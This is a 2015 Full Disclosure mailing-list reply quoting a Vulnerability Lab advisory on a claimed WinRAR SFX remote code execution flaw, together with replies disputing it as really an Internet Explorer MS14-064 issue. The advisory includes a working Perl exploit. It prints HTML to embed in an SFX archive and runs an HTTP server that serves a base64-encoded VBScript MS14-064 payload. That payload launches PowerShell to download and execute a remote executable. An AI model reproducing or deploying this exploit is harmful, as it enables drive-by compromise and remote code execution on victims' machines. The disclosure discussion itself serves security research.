Full Disclosure mailing list archives
Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability
From: Hernan Moller <hernan () nivel4 com>
Date: Sun, 4 Oct 2015 19:32:05 -0300
In fact, a SXF file type can only try to access a specific URL (server's attacker). Then the attacker exploits a Microsoft's vulnerability (ms14-064). The WinRAR file doesn't allow RCE by itself. -- Hernán Möller http://nivel4.com 2015-09-28 5:39 GMT-03:00 Gynvael Coldwind <gynvael () coldwind pl>:
Correct me if I'm wrong, but the vulnerability can be summarized as: if you run an untrusted .exe you might execute malicious code? I hardly see this as giving anything new to the attacker who can just create a malicious exe file, set the winrar sfx icon and send it to the victim. Keep in mind that not every unexpected behavior or software bug is a security vulnerability. (and no, potential AV bypass doesn't make it a vulnerability either) Cheers, Gynvael On Mon, 28 Sep 2015 10:27 Vulnerability Lab < research () vulnerability-lab com> wrote:Document Title: =============== WinRAR SFX v5.21 - Remote Code Execution Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1608 Video: https://www.youtube.com/watch?v=fo0l0oT4468 Release Date: ============= 2015-09-28 Vulnerability Laboratory ID (VL-ID): ==================================== 1608 Common Vulnerability Scoring System: ==================================== 9 Product & Service Introduction: =============================== WinRAR with over 500 million users worldwide by far the most popular compression program and therefore the best way to files securely and efficiently to pack for a data transfer to speed up the data transfer via e-mail and secure storage optimized files. (Copy of the Homepage: http://www.win-rar.com/start.html ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a code execution vulnerability in the official WInRAR SFX v5.21 software. Vulnerability Disclosure Timeline: ================================== 2015-09-28: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ A remote code execution vulnerability has been discovered in the official WInRAR SFX v5.21 software. The vulnerability allows remote attackers to unauthorized execute system specific code to comrpomise a target system. The issue is located in the `Text and Icon` function of the `Text to display in SFX window` module. Remote attackers are able to generate own compressed archives with maliciuous payloads to execute system specific codes for compromise. The attackers saved in the sfx archive input the malicious generated html code. Thus results in a system specific code execution when a target user or system is processing to open the comprossed archive. The security risk of the code execution vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 9.2. Exploitation of the code execution vulnerability requires low user interaction (open file) without privilege system or restricted user accounts. Successful exploitation of the remote code execution vulnerability in the WinRAR SFX software results in system, network or device compromise. Proof of Concept (PoC): ======================= The code execution vulnerability can be exploited by remote attackers without privilege system user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Run perl code : perl poc.pl 2. Right Click on any file and select "add to archive..." 3. Select "Create SFX archive" 4. Go to the Advanced Menu and select "SFX options..." 5. Go to the "Text and icon" Menu 6. Copy this perl output (HTML) and past on "Text to display in SFX window" 7. Click OK -- OK 8. Your SFX file Created 9. Just open sfx file 10. Your Link Download/Execute on your target 11. Successful reproduce of the code execution vulnerability! PoC: Exploit Code #!/usr/bin/perl # Title : WinRaR SFX - Remote Code Execution # Affected Versions: All Version # Tested on Windows 7 / Server 2008 # # Author: Mohammad Reza Espargham # Linkedin: https://ir.linkedin.com/in/rezasp # E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website: www.reza.es # Twitter: https://twitter.com/rezesp # FaceBook: https://www.facebook.com/reza.espargham # # ID: MS14-064 use strict; use warnings; use IO::Socket; use MIME::Base64 qw( decode_base64 ); use Socket 'inet_ntoa'; use Sys::Hostname 'hostname'; print " Mohammad Reza Espargham\n\n"; my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost')); my $port = 80; print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n" if($port==80); print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . ':' . $port . '"></head></html>'."\n\n" if($port!=80); my $server = new IO::Socket::INET( Proto => 'tcp', LocalPort => $port, Listen => SOMAXCONN, ReuseAddr => 1) or die "Unable to create server socket"; # Server loop while(my $client = $server->accept()) { my $client_info; while(<$client>) { last if /^\r\n$/; $client_info .= $_; } incoming($client, $client_info); } sub incoming { print "\n=== Incoming Request:\n"; my $client = shift; print $client &buildResponse($client, shift); close($client); } sub buildResponse { my $client = shift; my $client_info = shift; my$poc="CjxodG1sPgo8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVtdWxhdGVJRTgiID4KPGhlYWQ+CjwvaGVhZD4KPGJvZHk+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPgoKZnVuY3Rpb24gcnVubXVtYWEoKSAKT24gRXJyb3IgUmVzdW1lIE5leHQKc2V0IHNoZWxsPWNyZWF0ZW9iamVjdCgiU2hlbGwuQXBwbGljYXRpb24iKQpjb21tYW5kPSJJbnZva2UtRXhwcmVzc2lvbiAkKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovL3RoZS5lYXJ0aC5saS9+c2d0YXRoYW0vcHV0dHkvbGF0ZXN0L3g4Ni9wdXR0eS5leGUnLCdsb2FkLmV4ZScpOyQoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4ZWN1dGUoJ2xvYWQuZXhlJyk7IgpzaGVsbC5TaGVsbEV4ZWN1dGUgInBvd2Vyc2hlbGwuZXhlIiwgIi1Db21tYW5kICIgJiBjb21tYW5kLCAiIiwgInJ1bmFzIiwgMAplbmQgZnVuY3Rpb24KPC9zY3JpcHQ+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPgogIApkaW0gICBhYSgpCmRpbSAgIGFiKCkKZGltICAgYTAKZGltICAgYTEKZGltICAgYTIKZGltICAgYTMKZGltICAgd2luOXgKZGltICAgaW50VmVyc2lvbgpkaW0gICBybmRhCmRpbSAgIGZ1bmNsYXNzCmRpbSAgIG15YXJyYXkKIApCZWdpbigpCiAKZnVuY3Rpb24gQmVnaW4oKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgaW5mbz1OYXZpZ2F0b3IuVXNlckFnZW50CiAKICBpZihpbnN0cihpbmZvLCJXaW42NCIpPjApICAgdGhlbgogICAgIGV4aXQgICBmdW5jdGlvbgogIGVuZCBpZgogCiAgaWYgKGluc3RyKGluZm8sIk1TSUUiKT4wKSAgIHRoZW4gCiAgICAgICAgICAgICBpbnRWZXJzaW9uID0gQ0ludChNaWQoaW5mbywgSW5TdHIoaW5mbywgIk1TSUUiKSArIDUsIDIpKSAgIAogIGVsc2UKICAgICBleGl0ICAgZnVuY3Rpb24gIAogICAgICAgICAgICAgIAogIGVuZCBpZgogCiAgd2luOXg9MAogCiAgQmVnaW5Jbml0KCkKICBJZiBDcmVhdGUoKT1UcnVlIFRoZW4KICAgICBteWFycmF5PSAgICAgICAgY2hydygwMSkmY2hydygyMTc2KSZjaHJ3KDAxKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKQogICAgIG15YXJyYXk9bXlhcnJheSZjaHJ3KDAwKSZjaHJ3KDMyNzY3KSZjaHJ3KDAwKSZjaHJ3KDApCiAKICAgICBpZihpbnRWZXJzaW9uPDQpIHRoZW4KICAgICAgICAgZG9jdW1lbnQud3JpdGUoIjxicj4gSUUiKQogICAgICAgICBkb2N1bWVudC53cml0ZShpbnRWZXJzaW9uKQogICAgICAgICBydW5zaGVsbGNvZGUoKSAgICAgICAgICAgICAgICAgICAgCiAgICAgZWxzZSAgCiAgICAgICAgICBzZXRub3RzYWZlbW9kZSgpCiAgICAgZW5kIGlmCiAgZW5kIGlmCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIEJlZ2luSW5pdCgpCiAgIFJhbmRvbWl6ZSgpCiAgIHJlZGltIGFhKDUpCiAgIHJlZGltIGFiKDUpCiAgIGEwPTEzKzE3KnJuZCg2KQogICBhMz03KzMqcm5kKDUpCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIENyZWF0ZSgpCiAgT24gRXJyb3IgUmVzdW1lIE5leHQKICBkaW0gaQogIENyZWF0ZT1GYWxzZQogIEZvciBpID0gMCBUbyA0MDAKICAgIElmIE92ZXIoKT1UcnVlIFRoZW4KICAgICAgIENyZWF0ZT1UcnVlCiAgICAgICBFeGl0IEZvcgogICAgRW5kIElmIAogIE5leHQKZW5kIGZ1bmN0aW9uCiAKc3ViIHRlc3RhYSgpCmVuZCBzdWIKIApmdW5jdGlvbiBteWRhdGEoKQogICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgICBpPXRlc3RhYQogICAgIGk9bnVsbAogICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMikgIAogICAKICAgICBhYigwKT0wCiAgICAgYWEoYTEpPWkKICAgICBhYigwKT02LjM2NTk4NzM3NDM3ODAxRS0zMTQKIAogICAgIGFhKGExKzIpPW15YXJyYXkKICAgICBhYigyKT0xLjc0MDg4NTM0NzMxMzI0RS0zMTAgIAogICAgIG15ZGF0YT1hYShhMSkKICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApICAKZW5kIGZ1bmN0aW9uIAogCiAKZnVuY3Rpb24gc2V0bm90c2FmZW1vZGUoKQogICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIGk9bXlkYXRhKCkgIAogICAgaT1ydW0oaSs4KQogICAgaT1ydW0oaSsxNikKICAgIGo9cnVtKGkrJmgxMzQpICAKICAgIGZvciBrPTAgdG8gJmg2MCBzdGVwIDQKICAgICAgICBqPXJ1bShpKyZoMTIwK2spCiAgICAgICAgaWYoaj0xNCkgdGhlbgogICAgICAgICAgICAgIGo9MCAgICAgICAgICAKICAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAgICAgICAgICAgIAogICAgIGFhKGExKzIpKGkrJmgxMWMrayk9YWIoNCkKICAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApICAKIAogICAgIGo9MCAKICAgICAgICAgICAgICBqPXJ1bShpKyZoMTIwK2spICAgCiAgICAgICAgICAKICAgICAgICAgICAgICAgRXhpdCBmb3IKICAgICAgICAgICBlbmQgaWYKIAogICAgbmV4dCAKICAgIGFiKDIpPTEuNjk3NTk2NjMzMTY3NDdFLTMxMwogICAgcnVubXVtYWEoKSAKZW5kIGZ1bmN0aW9uCiAKZnVuY3Rpb24gT3ZlcigpCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dAogICAgZGltIHR5cGUxLHR5cGUyLHR5cGUzCiAgICBPdmVyPUZhbHNlCiAgICBhMD1hMCthMwogICAgYTE9YTArMgogICAgYTI9YTArJmg4MDAwMDAwCiAgIAogICAgcmVkaW0gIFByZXNlcnZlIGFhKGEwKSAKICAgIHJlZGltICAgYWIoYTApICAgICAKICAgCiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpCiAgIAogICAgdHlwZTE9MQogICAgYWIoMCk9MS4xMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAKICAgIGFhKGEwKT0xMAogICAgICAgICAgIAogICAgSWYoSXNPYmplY3QoYWEoYTEtMSkpID0gRmFsc2UpIFRoZW4KICAgICAgIGlmKGludFZlcnNpb248NCkgdGhlbgogICAgICAgICAgIG1lbT1jaW50KGEwKzEpKjE2ICAgICAgICAgICAgIAogICAgICAgICAgIGo9dmFydHlwZShhYShhMS0xKSkKICAgICAgICAgICBpZigoaj1tZW0rNCkgb3IgKGoqOD1tZW0rOCkpIHRoZW4KICAgICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAgICAgICAgICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbiAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUoYWEoYTEpKQogICAgICAgICAgICAgICAgIGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICAgIGVuZCBpZgogICAgICAgICAgIGVsc2UKICAgICAgICAgICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKICAgICAgICAgICAgIGV4aXQgIGZ1bmN0aW9uCiAKICAgICAgICAgICBlbmQgaWYgCiAgICAgICAgZWxzZQogICAgICAgICAgIGlmKHZhcnR5cGUoYWEoYTEtMSkpPD4wKSAgVGhlbiAgICAKICAgICAgICAgICAgICBJZihJc09iamVjdChhYShhMSkpID0gRmFsc2UgKSBUaGVuCiAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUoYWEoYTEpKQogICAgICAgICAgICAgIGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICBlbmQgaWYKICAgICAgICBlbmQgaWYKICAgIGVuZCBpZgogICAgICAgICAgICAgICAKICAgICAKICAgIElmKHR5cGUxPSZoMmY2NikgVGhlbiAgICAgICAgIAogICAgICAgICAgT3Zlcj1UcnVlICAgICAgCiAgICBFbmQgSWYgIAogICAgSWYodHlwZTE9JmhCOUFEKSBUaGVuCiAgICAgICAgICBPdmVyPVRydWUKICAgICAgICAgIHdpbjl4PTEKICAgIEVuZCBJZiAgCiAKICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkgICAgICAgICAgCiAgICAgICAgIAplbmQgZnVuY3Rpb24KIApmdW5jdGlvbiBydW0oYWRkKSAKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAKICAgCiAgICBhYigwKT0wICAgCiAgICBhYShhMSk9YWRkKzQgICAgIAogICAgYWIoMCk9MS42OTc1OTY2MzMxNjc0N0UtMzEzICAgICAgIAogICAgcnVtPWxlbmIoYWEoYTEpKSAgCiAgICAKICAgIGFiKDApPTAKICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKZW5kIGZ1bmN0aW9uCiAKPC9zY3JpcHQ+CiAKPC9ib2R5Pgo8L2h0bWw+"; $poc = decode_base64($poc); my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n $poc"; return $r; } Security Risk: ============== The security risk of the code execution vulnerability in the winrar sfx software is estimated as high. (CVSS 7.4) Credits & Authors: ================== Mohammad Reza Espargham [https://ir.linkedin.com/in/rezasp] (me () reza es or reza.espargham () gmail com] (www.reza.es) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is withoutanywarranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capabilityfora particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendorlicenses,policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin () vulnerability-lab com - research () vulnerability-lab com - admin () evolution-sec com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors ormanagers.To record, list (feed), modify, use or edit our material contact (admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research () vulnerability-lab com PGP KEY:http://www.vulnerability-lab.com/keys/admin () vulnerability-lab com%280x198E9928%29.txt_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Gynvael Coldwind (Oct 01)
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Hernan Moller (Oct 05)
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Stefan Kanthak (Oct 05)
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Shawn McMahon (Oct 08)
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Stefan Kanthak (Oct 10)
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Fernando Mercês (Oct 19)
- Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability Shawn McMahon (Oct 08)